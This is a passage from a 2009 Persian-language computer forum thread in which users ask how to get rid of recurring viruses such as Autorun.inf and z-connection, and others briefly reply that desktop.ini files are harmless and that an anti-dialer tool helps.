این ویروس kazmegheyz از کجا مییاد تو این کامپیوتر لعنتی؟؟؟:2:
تا حالا بیشتر از 10 بار پاکش کردم اما بعد از یکی 2 روز دوباره...........

kont_prince
16-07-2009, 05:29
آقا یکی کمک کنه.منم این ویروس Autorun.inf گرفتم.
کارایی که پست اول گفت کردم. ولی پاک نشد.
کمک کنید لطفا...

سلام...همینی که ایشون میگن!اصلا اون مقادیری که باید تو regedit عوض کنیم(مثلا از صفر به یک یا دو) خودشون

یا 1 هستن یا 2!

از قرار معلوم ویروس هم آپدیت میشه:31:

کسی نیست کمک کنه؟؟:10:

[ali]
16-07-2009, 05:49
تو همه فولدرهام یه فایلی به اسم Desktop هست.این ویروسه؟چیکارش کنم؟
desktop.ini؟
نه مشکلی نیست

[ali]
16-07-2009, 05:56
راه حل ويروس z-connection رو هم بگين
از یک نرم افرزار آنتی دیالر باید استفاده کنید